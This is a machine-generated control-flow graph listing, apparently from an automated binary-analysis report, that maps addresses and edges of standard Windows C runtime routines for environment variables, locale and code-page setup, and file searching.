FindNextFileW 14929->14933 14931 7ff6e5ac4444 _findclose 11 API calls 14930->14931 14932 7ff6e5ac688a 14931->14932 14934 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 14932->14934 14935 7ff6e5ac6914 14933->14935 14936 7ff6e5ac68d3 GetLastError 14933->14936 14951 7ff6e5ac6895 14934->14951 14937 7ff6e5ac6984 _wfindfirst32i64 10 API calls 14935->14937 14938 7ff6e5ac68de 14936->14938 14939 7ff6e5ac6907 14936->14939 14941 7ff6e5ac692c 14937->14941 14938->14939 14944 7ff6e5ac68e8 14938->14944 14945 7ff6e5ac68fa 14938->14945 14940 7ff6e5ac4444 _findclose 11 API calls 14939->14940 14940->14951 14943 7ff6e5ac6984 _wfindfirst32i64 10 API calls 14941->14943 14942 7ff6e5abad80 _wfindfirst32i64 8 API calls 14947 7ff6e5ac68a8 14942->14947 14948 7ff6e5ac693a 14943->14948 14944->14939 14949 7ff6e5ac68ed 14944->14949 14946 7ff6e5ac4444 _findclose 11 API calls 14945->14946 14946->14951 14952 7ff6e5ac6984 _wfindfirst32i64 10 API calls 14948->14952 14950 7ff6e5ac4444 _findclose 11 API calls 14949->14950 14950->14951 14951->14942 14953 7ff6e5ac6948 14952->14953 14954 7ff6e5acf924 _wfindfirst32i64 37 API calls 14953->14954 14955 7ff6e5ac6966 14954->14955 14955->14951 14956 7ff6e5ac696e 14955->14956 14957 7ff6e5ac9dd0 _wfindfirst32i64 17 API calls 14956->14957 14958 7ff6e5ac6982 14957->14958 14960 7ff6e5ac69a2 FileTimeToSystemTime 14959->14960 14961 7ff6e5ac699c 14959->14961 14962 7ff6e5ac69b1 SystemTimeToTzSpecificLocalTime 14960->14962 14963 7ff6e5ac69c7 14960->14963 14961->14960 14961->14963 14962->14963 14964 7ff6e5abad80 _wfindfirst32i64 8 API calls 14963->14964 14965 7ff6e5ac6801 14964->14965 14965->14914 18170 7ff6e5acfa08 18171 7ff6e5acfa2c 18170->18171 18173 7ff6e5acfa3c 18170->18173 18172 7ff6e5ac4444 _findclose 11 API calls 18171->18172 18191 7ff6e5acfa31 18172->18191 18174 7ff6e5acfd1c 18173->18174 18175 7ff6e5acfa5e 18173->18175 18176 7ff6e5ac4444 _findclose 11 API calls 18174->18176 18177 7ff6e5acfa7f 18175->18177 18301 7ff6e5ad00c4 18175->18301 18178 7ff6e5acfd21 18176->18178 18181 7ff6e5acfaf1 18177->18181 18183 7ff6e5acfaa5 18177->18183 18187 7ff6e5acfae5 18177->18187 18180 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18178->18180 18180->18191 18185 7ff6e5acdd40 _findclose 11 API calls 18181->18185 18201 7ff6e5acfab4 18181->18201 18182 7ff6e5acfb9e 18195 7ff6e5acfbbb 18182->18195 18202 7ff6e5acfc0d 18182->18202 18316 7ff6e5ac8518 18183->18316 18188 7ff6e5acfb07 18185->18188 18187->18182 18187->18201 18322 7ff6e5ad64ac 18187->18322 18192 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18188->18192 18190 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18190->18191 18197 7ff6e5acfb15 18192->18197 18193 7ff6e5acfaaf 18198 7ff6e5ac4444 _findclose 11 API calls 18193->18198 18194 7ff6e5acfacd 18194->18187 18200 7ff6e5ad00c4 45 API calls 18194->18200 18196 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18195->18196 18199 7ff6e5acfbc4 18196->18199 18197->18187 18197->18201 18205 7ff6e5acdd40 _findclose 11 API calls 18197->18205 18198->18201 18211 7ff6e5acfbc9 18199->18211 18358 7ff6e5ad24fc 18199->18358 18200->18187 18201->18190 18202->18201 18203 7ff6e5ad24fc 40 API calls 18202->18203 18204 7ff6e5acfc4a 18203->18204 18206 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18204->18206 18208 7ff6e5acfb37 18205->18208 18209 7ff6e5acfc54 18206->18209 18213 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18208->18213 18209->18201 18209->18211 18210 7ff6e5acfd10 18214 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18210->18214 18211->18210 18216 7ff6e5acdd40 _findclose 11 API calls 18211->18216 18212 7ff6e5acfbf5 18215 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18212->18215 18213->18187 18214->18191 18215->18211 18217 7ff6e5acfc98 18216->18217 18218 7ff6e5acfca0 18217->18218 18219 7ff6e5acfca9 18217->18219 18221 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18218->18221 18220 7ff6e5ac91ac __std_exception_copy 37 API calls 18219->18220 18222 7ff6e5acfcb8 18220->18222 18242 7ff6e5acfca7 18221->18242 18223 7ff6e5acfcc0 18222->18223 18224 7ff6e5acfd4b 18222->18224 18367 7ff6e5ad65c4 18223->18367 18226 7ff6e5ac9dd0 _wfindfirst32i64 17 API calls 18224->18226 18229 7ff6e5acfd5f 18226->18229 18227 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18227->18191 18232 7ff6e5acfd88 18229->18232 18237 7ff6e5acfd98 18229->18237 18230 7ff6e5acfce7 18233 7ff6e5ac4444 _findclose 11 API calls 18230->18233 18231 7ff6e5acfd08 18235 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18231->18235 18234 7ff6e5ac4444 _findclose 11 API calls 18232->18234 18236 7ff6e5acfcec 18233->18236 18260 7ff6e5acfd8d 18234->18260 18235->18210 18239 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18236->18239 18238 7ff6e5ad007b 18237->18238 18240 7ff6e5acfdba 18237->18240 18241 7ff6e5ac4444 _findclose 11 API calls 18238->18241 18239->18242 18243 7ff6e5acfdd7 18240->18243 18386 7ff6e5ad01ac 18240->18386 18244 7ff6e5ad0080 18241->18244 18242->18227 18247 7ff6e5acfe4b 18243->18247 18249 7ff6e5acfdff 18243->18249 18255 7ff6e5acfe3f 18243->18255 18246 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18244->18246 18246->18260 18251 7ff6e5acfe73 18247->18251 18256 7ff6e5acdd40 _findclose 11 API calls 18247->18256 18271 7ff6e5acfe0e 18247->18271 18248 7ff6e5acfefe 18259 7ff6e5acff1b 18248->18259 18268 7ff6e5acff6e 18248->18268 18401 7ff6e5ac8554 18249->18401 18253 7ff6e5acdd40 _findclose 11 API calls 18251->18253 18251->18255 18251->18271 18258 7ff6e5acfe95 18253->18258 18254 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18254->18260 18255->18248 18255->18271 18407 7ff6e5ad636c 18255->18407 18261 7ff6e5acfe65 18256->18261 18264 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18258->18264 18265 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18259->18265 18266 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18261->18266 18262 7ff6e5acfe27 18262->18255 18270 7ff6e5ad01ac 45 API calls 18262->18270 18263 7ff6e5acfe09 18267 7ff6e5ac4444 _findclose 11 API calls 18263->18267 18264->18255 18269 7ff6e5acff24 18265->18269 18266->18251 18267->18271 18268->18271 18272 7ff6e5ad24fc 40 API calls 18268->18272 18275 7ff6e5ad24fc 40 API calls 18269->18275 18278 7ff6e5acff2a 18269->18278 18270->18255 18271->18254 18273 7ff6e5acffac 18272->18273 18274 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18273->18274 18276 7ff6e5acffb6 18274->18276 18279 7ff6e5acff56 18275->18279 18276->18271 18276->18278 18277 7ff6e5ad006f 18280 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18277->18280 18278->18277 18282 7ff6e5acdd40 _findclose 11 API calls 18278->18282 18281 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18279->18281 18280->18260 18281->18278 18283 7ff6e5acfffb 18282->18283 18284 7ff6e5ad0003 18283->18284 18285 7ff6e5ad000c 18283->18285 18287 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18284->18287 18286 7ff6e5acf924 _wfindfirst32i64 37 API calls 18285->18286 18289 7ff6e5ad001a 18286->18289 18288 7ff6e5ad000a 18287->18288 18295 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18288->18295 18290 7ff6e5ad0022 SetEnvironmentVariableW 18289->18290 18291 7ff6e5ad00af 18289->18291 18292 7ff6e5ad0046 18290->18292 18293 7ff6e5ad0067 18290->18293 18294 7ff6e5ac9dd0 _wfindfirst32i64 17 API calls 18291->18294 18296 7ff6e5ac4444 _findclose 11 API calls 18292->18296 18298 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18293->18298 18297 7ff6e5ad00c3 18294->18297 18295->18260 18299 7ff6e5ad004b 18296->18299 18298->18277 18300 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18299->18300 18300->18288 18302 7ff6e5ad00e1 18301->18302 18303 7ff6e5ad00f9 18301->18303 18302->18177 18304 7ff6e5acdd40 _findclose 11 API calls 18303->18304 18305 7ff6e5ad011d 18304->18305 18307 7ff6e5ad017e 18305->18307 18310 7ff6e5acdd40 _findclose 11 API calls 18305->18310 18311 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18305->18311 18312 7ff6e5ac91ac __std_exception_copy 37 API calls 18305->18312 18313 7ff6e5ad018d 18305->18313 18315 7ff6e5ad01a2 18305->18315 18306 7ff6e5ac920c __GetCurrentState 45 API calls 18308 7ff6e5ad01a8 18306->18308 18309 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18307->18309 18309->18302 18310->18305 18311->18305 18312->18305 18314 7ff6e5ac9dd0 _wfindfirst32i64 17 API calls 18313->18314 18314->18315 18315->18306 18317 7ff6e5ac8528 18316->18317 18320 7ff6e5ac8531 18316->18320 18317->18320 18431 7ff6e5ac7ff0 18317->18431 18320->18193 18320->18194 18323 7ff6e5ad565c 18322->18323 18324 7ff6e5ad64b9 18322->18324 18325 7ff6e5ad5669 18323->18325 18333 7ff6e5ad569f 18323->18333 18326 7ff6e5ac4a1c 45 API calls 18324->18326 18328 7ff6e5ac4444 _findclose 11 API calls 18325->18328 18346 7ff6e5ad5610 18325->18346 18327 7ff6e5ad64ed 18326->18327 18330 7ff6e5ad64f2 18327->18330 18334 7ff6e5ad6503 18327->18334 18338 7ff6e5ad651a 18327->18338 18331 7ff6e5ad5673 18328->18331 18329 7ff6e5ad56c9 18332 7ff6e5ac4444 _findclose 11 API calls 18329->18332 18330->18187 18335 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 18331->18335 18336 7ff6e5ad56ce 18332->18336 18333->18329 18337 7ff6e5ad56ee 18333->18337 18339 7ff6e5ac4444 _findclose 11 API calls 18334->18339 18340 7ff6e5ad567e 18335->18340 18341 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 18336->18341 18342 7ff6e5ac4a1c 45 API calls 18337->18342 18349 7ff6e5ad56d9 18337->18349 18344 7ff6e5ad6524 18338->18344 18345 7ff6e5ad6536 18338->18345 18343 7ff6e5ad6508 18339->18343 18340->18187 18341->18349 18342->18349 18350 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 18343->18350 18351 7ff6e5ac4444 _findclose 11 API calls 18344->18351 18347 7ff6e5ad655e 18345->18347 18348 7ff6e5ad6547 18345->18348 18346->18187 18672 7ff6e5ad8388 18347->18672 18663 7ff6e5ad56ac 18348->18663 18349->18187 18350->18330 18354 7ff6e5ad6529 18351->18354 18356 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 18354->18356 18356->18330 18357 7ff6e5ac4444 _findclose 11 API calls 18357->18330 18359 7ff6e5ad251e 18358->18359 18360 7ff6e5ad253b 18358->18360 18359->18360 18361 7ff6e5ad252c 18359->18361 18362 7ff6e5ad2545 18360->18362 18712 7ff6e5ad6fb8 18360->18712 18363 7ff6e5ac4444 _findclose 11 API calls 18361->18363 18719 7ff6e5acf98c 18362->18719 18366 7ff6e5ad2531 __scrt_get_show_window_mode 18363->18366 18366->18212 18368 7ff6e5ac4a1c 45 API calls 18367->18368 18369 7ff6e5ad662a 18368->18369 18370 7ff6e5acdfcc 5 API calls 18369->18370 18371 7ff6e5ad6638 18369->18371 18370->18371 18372 7ff6e5ac4504 14 API calls 18371->18372 18373 7ff6e5ad6694 18372->18373 18374 7ff6e5ad6724 18373->18374 18375 7ff6e5ac4a1c 45 API calls 18373->18375 18377 7ff6e5ad6735 18374->18377 18378 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18374->18378 18376 7ff6e5ad66a7 18375->18376 18380 7ff6e5acdfcc 5 API calls 18376->18380 18383 7ff6e5ad66b0 18376->18383 18379 7ff6e5acfce3 18377->18379 18381 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18377->18381 18378->18377 18379->18230 18379->18231 18380->18383 18381->18379 18382 7ff6e5ac4504 14 API calls 18384 7ff6e5ad670b 18382->18384 18383->18382 18384->18374 18385 7ff6e5ad6713 SetEnvironmentVariableW 18384->18385 18385->18374 18387 7ff6e5ad01cf 18386->18387 18388 7ff6e5ad01ec 18386->18388 18387->18243 18389 7ff6e5acdd40 _findclose 11 API calls 18388->18389 18395 7ff6e5ad0210 18389->18395 18390 7ff6e5ad0271 18392 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18390->18392 18391 7ff6e5ac920c __GetCurrentState 45 API calls 18393 7ff6e5ad029a 18391->18393 18392->18387 18394 7ff6e5acdd40 _findclose 11 API calls 18394->18395 18395->18390 18395->18394 18396 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18395->18396 18397 7ff6e5acf924 _wfindfirst32i64 37 API calls 18395->18397 18398 7ff6e5ad0280 18395->18398 18400 7ff6e5ad0294 18395->18400 18396->18395 18397->18395 18399 7ff6e5ac9dd0 _wfindfirst32i64 17 API calls 18398->18399 18399->18400 18400->18391 18402 7ff6e5ac856d 18401->18402 18403 7ff6e5ac8564 18401->18403 18402->18262 18402->18263 18403->18402 18404 7ff6e5ac8064 40 API calls 18403->18404 18405 7ff6e5ac8576 18404->18405 18405->18402 18406 7ff6e5ac8424 12 API calls 18405->18406 18406->18402 18408 7ff6e5ad6379 18407->18408 18412 7ff6e5ad63a6 18407->18412 18409 7ff6e5ad637e 18408->18409 18408->18412 18410 7ff6e5ac4444 _findclose 11 API calls 18409->18410 18411 7ff6e5ad6383 18410->18411 18414 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 18411->18414 18413 7ff6e5ad63ea 18412->18413 18415 7ff6e5ad6409 18412->18415 18429 7ff6e5ad63de __crtLCMapStringW 18412->18429 18416 7ff6e5ac4444 _findclose 11 API calls 18413->18416 18417 7ff6e5ad638e 18414->18417 18418 7ff6e5ad6413 18415->18418 18419 7ff6e5ad6425 18415->18419 18420 7ff6e5ad63ef 18416->18420 18417->18255 18421 7ff6e5ac4444 _findclose 11 API calls 18418->18421 18422 7ff6e5ac4a1c 45 API calls 18419->18422 18423 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 18420->18423 18424 7ff6e5ad6418 18421->18424 18425 7ff6e5ad6432 18422->18425 18423->18429 18426 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 18424->18426 18425->18429 18731 7ff6e5ad7f44 18425->18731 18426->18429 18429->18255 18430 7ff6e5ac4444 _findclose 11 API calls 18430->18429 18432 7ff6e5ac8009 18431->18432 18445 7ff6e5ac8005 18431->18445 18454 7ff6e5ad1730 18432->18454 18437 7ff6e5ac8027 18480 7ff6e5ac80d4 18437->18480 18438 7ff6e5ac801b 18439 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18438->18439 18439->18445 18442 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18443 7ff6e5ac804e 18442->18443 18444 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18443->18444 18444->18445 18445->18320 18446 7ff6e5ac8344 18445->18446 18447 7ff6e5ac836d 18446->18447 18452 7ff6e5ac8386 18446->18452 18447->18320 18448 7ff6e5acdd40 _findclose 11 API calls 18448->18452 18449 7ff6e5ac8416 18451 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18449->18451 18450 7ff6e5acf0b8 WideCharToMultiByte 18450->18452 18451->18447 18452->18447 18452->18448 18452->18449 18452->18450 18453 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18452->18453 18453->18452 18455 7ff6e5ad173d 18454->18455 18456 7ff6e5ac800e 18454->18456 18499 7ff6e5aca6f4 18455->18499 18460 7ff6e5ad1a6c GetEnvironmentStringsW 18456->18460 18461 7ff6e5ac8013 18460->18461 18462 7ff6e5ad1a9c 18460->18462 18461->18437 18461->18438 18463 7ff6e5acf0b8 WideCharToMultiByte 18462->18463 18464 7ff6e5ad1aed 18463->18464 18465 7ff6e5ad1af4 FreeEnvironmentStringsW 18464->18465 18466 7ff6e5accacc _fread_nolock 12 API calls 18464->18466 18465->18461 18467 7ff6e5ad1b07 18466->18467 18468 7ff6e5ad1b0f 18467->18468 18469 7ff6e5ad1b18 18467->18469 18470 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18468->18470 18471 7ff6e5acf0b8 WideCharToMultiByte 18469->18471 18472 7ff6e5ad1b16 18470->18472 18473 7ff6e5ad1b3b 18471->18473 18472->18465 18474 7ff6e5ad1b3f 18473->18474 18475 7ff6e5ad1b49 18473->18475 18477 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18474->18477 18476 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18475->18476 18478 7ff6e5ad1b47 FreeEnvironmentStringsW 18476->18478 18477->18478 18478->18461 18481 7ff6e5ac80f9 18480->18481 18482 7ff6e5acdd40 _findclose 11 API calls 18481->18482 18495 7ff6e5ac812f 18482->18495 18483 7ff6e5ac8137 18484 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18483->18484 18485 7ff6e5ac802f 18484->18485 18485->18442 18486 7ff6e5ac81aa 18487 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18486->18487 18487->18485 18488 7ff6e5acdd40 _findclose 11 API calls 18488->18495 18489 7ff6e5ac8199 18490 7ff6e5ac8300 11 API calls 18489->18490 18492 7ff6e5ac81a1 18490->18492 18491 7ff6e5ac91ac __std_exception_copy 37 API calls 18491->18495 18493 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18492->18493 18493->18483 18494 7ff6e5ac81cf 18496 7ff6e5ac9dd0 _wfindfirst32i64 17 API calls 18494->18496 18495->18483 18495->18486 18495->18488 18495->18489 18495->18491 18495->18494 18497 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18495->18497 18498 7ff6e5ac81e2 18496->18498 18497->18495 18500 7ff6e5aca705 FlsGetValue 18499->18500 18501 7ff6e5aca720 FlsSetValue 18499->18501 18502 7ff6e5aca712 18500->18502 18503 7ff6e5aca71a 18500->18503 18501->18502 18504 7ff6e5aca72d 18501->18504 18505 7ff6e5aca718 18502->18505 18506 7ff6e5ac920c __GetCurrentState 45 API calls 18502->18506 18503->18501 18507 7ff6e5acdd40 _findclose 11 API calls 18504->18507 18519 7ff6e5ad1404 18505->18519 18508 7ff6e5aca795 18506->18508 18509 7ff6e5aca73c 18507->18509 18510 7ff6e5aca75a FlsSetValue 18509->18510 18511 7ff6e5aca74a FlsSetValue 18509->18511 18512 7ff6e5aca766 FlsSetValue 18510->18512 18513 7ff6e5aca778 18510->18513 18514 7ff6e5aca753 18511->18514 18512->18514 18515 7ff6e5aca3c4 _findclose 11 API calls 18513->18515 18516 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18514->18516 18517 7ff6e5aca780 18515->18517 18516->18502 18518 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18517->18518 18518->18505 18542 7ff6e5ad1674 18519->18542 18521 7ff6e5ad1439 18557 7ff6e5ad1104 18521->18557 18524 7ff6e5ad1456 18524->18456 18525 7ff6e5accacc _fread_nolock 12 API calls 18526 7ff6e5ad1467 18525->18526 18527 7ff6e5ad146f 18526->18527 18529 7ff6e5ad147e 18526->18529 18528 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18527->18528 18528->18524 18529->18529 18564 7ff6e5ad17ac 18529->18564 18532 7ff6e5ad157a 18533 7ff6e5ac4444 _findclose 11 API calls 18532->18533 18535 7ff6e5ad157f 18533->18535 18534 7ff6e5ad15d5 18537 7ff6e5ad163c 18534->18537 18575 7ff6e5ad0f34 18534->18575 18538 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18535->18538 18536 7ff6e5ad1594 18536->18534 18539 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18536->18539 18541 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18537->18541 18538->18524 18539->18534 18541->18524 18543 7ff6e5ad1697 18542->18543 18544 7ff6e5ad16a1 18543->18544 18590 7ff6e5acf788 EnterCriticalSection 18543->18590 18546 7ff6e5ad1713 18544->18546 18549 7ff6e5ac920c __GetCurrentState 45 API calls 18544->18549 18546->18521 18551 7ff6e5ad172b 18549->18551 18553 7ff6e5ad1782 18551->18553 18554 7ff6e5aca6f4 50 API calls 18551->18554 18553->18521 18555 7ff6e5ad176c 18554->18555 18556 7ff6e5ad1404 65 API calls 18555->18556 18556->18553 18558 7ff6e5ac4a1c 45 API calls 18557->18558 18559 7ff6e5ad1118 18558->18559 18560 7ff6e5ad1124 GetOEMCP 18559->18560 18561 7ff6e5ad1136 18559->18561 18563 7ff6e5ad114b 18560->18563 18562 7ff6e5ad113b GetACP 18561->18562 18561->18563 18562->18563 18563->18524 18563->18525 18565 7ff6e5ad1104 47 API calls 18564->18565 18566 7ff6e5ad17d9 18565->18566 18567 7ff6e5ad192f 18566->18567 18568 7ff6e5ad1816 IsValidCodePage 18566->18568 18574 7ff6e5ad1830 __scrt_get_show_window_mode 18566->18574 18569 7ff6e5abad80 _wfindfirst32i64 8 API calls 18567->18569 18568->18567 18570 7ff6e5ad1827 18568->18570 18571 7ff6e5ad1571 18569->18571 18572 7ff6e5ad1856 GetCPInfo 18570->18572 18570->18574 18571->18532 18571->18536 18572->18567 18572->18574 18591 7ff6e5ad121c 18574->18591 18662 7ff6e5acf788 EnterCriticalSection 18575->18662 18592 7ff6e5ad1259 GetCPInfo 18591->18592 18593 7ff6e5ad134f 18591->18593 18592->18593 18599 7ff6e5ad126c 18592->18599 18594 7ff6e5abad80 _wfindfirst32i64 8 API calls 18593->18594 18596 7ff6e5ad13ee 18594->18596 18596->18567 18602 7ff6e5ad1f60 18599->18602 18601 7ff6e5ad6f04 54 API calls 18601->18593 18603 7ff6e5ac4a1c 45 API calls 18602->18603 18604 7ff6e5ad1fa2 18603->18604 18605 7ff6e5ace7f0 _fread_nolock MultiByteToWideChar 18604->18605 18607 7ff6e5ad1fd8 18605->18607 18606 7ff6e5ad1fdf 18608 7ff6e5abad80 _wfindfirst32i64 8 API calls 18606->18608 18607->18606 18609 7ff6e5ad209c 18607->18609 18610 7ff6e5accacc _fread_nolock 12 API calls 18607->18610 18613 7ff6e5ad2008 __scrt_get_show_window_mode 18607->18613 18611 7ff6e5ad12e3 18608->18611 18609->18606 18612 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18609->18612 18610->18613 18617 7ff6e5ad6f04 18611->18617 18612->18606 18613->18609 18614 7ff6e5ace7f0 _fread_nolock MultiByteToWideChar 18613->18614 18615 7ff6e5ad207e 18614->18615 18615->18609 18616 7ff6e5ad2082 GetStringTypeW 18615->18616 18616->18609 18618 7ff6e5ac4a1c 45 API calls 18617->18618 18619 7ff6e5ad6f29 18618->18619 18622 7ff6e5ad6bd0 18619->18622 18623 7ff6e5ad6c11 18622->18623 18624 7ff6e5ace7f0 _fread_nolock MultiByteToWideChar 18623->18624 18628 7ff6e5ad6c5b 18624->18628 18625 7ff6e5ad6ed9 18627 7ff6e5abad80 _wfindfirst32i64 8 API calls 18625->18627 18626 7ff6e5ad6d91 18626->18625 18631 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18626->18631 18629 7ff6e5ad1316 18627->18629 18628->18625 18628->18626 18630 7ff6e5accacc _fread_nolock 12 API calls 18628->18630 18632 7ff6e5ad6c93 18628->18632 18629->18601 18630->18632 18631->18625 18632->18626 18633 7ff6e5ace7f0 _fread_nolock MultiByteToWideChar 18632->18633 18634 7ff6e5ad6d06 18633->18634 18634->18626 18653 7ff6e5ace18c 18634->18653 18637 7ff6e5ad6da2 18639 7ff6e5accacc _fread_nolock 12 API calls 18637->18639 18641 7ff6e5ad6dc0 18637->18641 18650 7ff6e5ad6e74 18637->18650 18638 7ff6e5ad6d51 18638->18626 18640 7ff6e5ace18c __crtLCMapStringW 6 API calls 18638->18640 18639->18641 18640->18626 18641->18626 18643 7ff6e5ace18c __crtLCMapStringW 6 API calls 18641->18643 18642 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18642->18626 18644 7ff6e5ad6e40 18643->18644 18645 7ff6e5ad6e60 18644->18645 18646 7ff6e5ad6e76 18644->18646 18644->18650 18647 7ff6e5acf0b8 WideCharToMultiByte 18645->18647 18648 7ff6e5acf0b8 WideCharToMultiByte 18646->18648 18649 7ff6e5ad6e6e 18647->18649 18648->18649 18649->18650 18651 7ff6e5ad6e8e 18649->18651 18650->18626 18650->18642 18651->18626 18652 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18651->18652 18652->18626 18654 7ff6e5acddb8 __crtLCMapStringW 5 API calls 18653->18654 18655 7ff6e5ace1ca 18654->18655 18656 7ff6e5ace1d2 18655->18656 18659 7ff6e5ace278 18655->18659 18656->18626 18656->18637 18656->18638 18658 7ff6e5ace23b LCMapStringW 18658->18656 18660 7ff6e5acddb8 __crtLCMapStringW 5 API calls 18659->18660 18661 7ff6e5ace2a6 __crtLCMapStringW 18660->18661 18661->18658 18664 7ff6e5ad56e0 18663->18664 18665 7ff6e5ad56c9 18663->18665 18664->18665 18668 7ff6e5ad56ee 18664->18668 18666 7ff6e5ac4444 _findclose 11 API calls 18665->18666 18667 7ff6e5ad56ce 18666->18667 18669 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 18667->18669 18670 7ff6e5ac4a1c 45 API calls 18668->18670 18671 7ff6e5ad56d9 18668->18671 18669->18671 18670->18671 18671->18330 18673 7ff6e5ac4a1c 45 API calls 18672->18673 18674 7ff6e5ad83ad 18673->18674 18677 7ff6e5ad8004 18674->18677 18678 7ff6e5ad8052 18677->18678 18681 7ff6e5ad80d9 18678->18681 18683 7ff6e5ad80c4 GetCPInfo 18678->18683 18684 7ff6e5ad80dd 18678->18684 18679 7ff6e5abad80 _wfindfirst32i64 8 API calls 18680 7ff6e5ad6585 18679->18680 18680->18330 18680->18357 18682 7ff6e5ace7f0 _fread_nolock MultiByteToWideChar 18681->18682 18681->18684 18685 7ff6e5ad8171 18682->18685 18683->18681 18683->18684 18684->18679 18685->18684 18686 7ff6e5accacc _fread_nolock 12 API calls 18685->18686 18687 7ff6e5ad81a8 18685->18687 18686->18687 18687->18684 18688 7ff6e5ace7f0 _fread_nolock MultiByteToWideChar 18687->18688 18689 7ff6e5ad8216 18688->18689 18690 7ff6e5ad82f8 18689->18690 18691 7ff6e5ace7f0 _fread_nolock MultiByteToWideChar 18689->18691 18690->18684 18692 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18690->18692 18693 7ff6e5ad823c 18691->18693 18692->18684 18693->18690 18694 7ff6e5accacc _fread_nolock 12 API calls 18693->18694 18695 7ff6e5ad8269 18693->18695 18694->18695 18695->18690 18696 7ff6e5ace7f0 _fread_nolock MultiByteToWideChar 18695->18696 18697 7ff6e5ad82e0 18696->18697 18698 7ff6e5ad8300 18697->18698 18699 7ff6e5ad82e6 18697->18699 18706 7ff6e5ace010 18698->18706 18699->18690 18701 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18699->18701 18701->18690 18703 7ff6e5ad833f 18703->18684 18705 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18703->18705 18704 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18704->18703 18705->18684 18707 7ff6e5acddb8 __crtLCMapStringW 5 API calls 18706->18707 18708 7ff6e5ace04e 18707->18708 18709 7ff6e5ace056 18708->18709 18710 7ff6e5ace278 __crtLCMapStringW 5 API calls 18708->18710 18709->18703 18709->18704 18711 7ff6e5ace0bf CompareStringW 18710->18711 18711->18709 18713 7ff6e5ad6fc1 18712->18713 18714 7ff6e5ad6fda HeapSize 18712->18714 18715 7ff6e5ac4444 _findclose 11 API calls 18713->18715 18716 7ff6e5ad6fc6 18715->18716 18717 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 18716->18717 18718 7ff6e5ad6fd1 18717->18718 18718->18362 18720 7ff6e5acf9a1 18719->18720 18721 7ff6e5acf9ab 18719->18721 18722 7ff6e5accacc _fread_nolock 12 API calls 18720->18722 18723 7ff6e5acf9b0 18721->18723 18729 7ff6e5acf9b7 _findclose 18721->18729 18727 7ff6e5acf9a9 18722->18727 18724 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18723->18724 18724->18727 18725 7ff6e5acf9ea HeapReAlloc 18725->18727 18725->18729 18726 7ff6e5acf9bd 18728 7ff6e5ac4444 _findclose 11 API calls 18726->18728 18727->18366 18728->18727 18729->18725 18729->18726 18730 7ff6e5ad26b0 _findclose 2 API calls 18729->18730 18730->18729 18732 7ff6e5ad7f6d __crtLCMapStringW 18731->18732 18733 7ff6e5ace010 6 API calls 18732->18733 18734 7ff6e5ad646e 18732->18734 18733->18734 18734->18429 18734->18430 18762 7ff6e5ad96f9 18763 7ff6e5ad9712 18762->18763 18764 7ff6e5ad9708 18762->18764 18766 7ff6e5acf7e8 LeaveCriticalSection 18764->18766

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
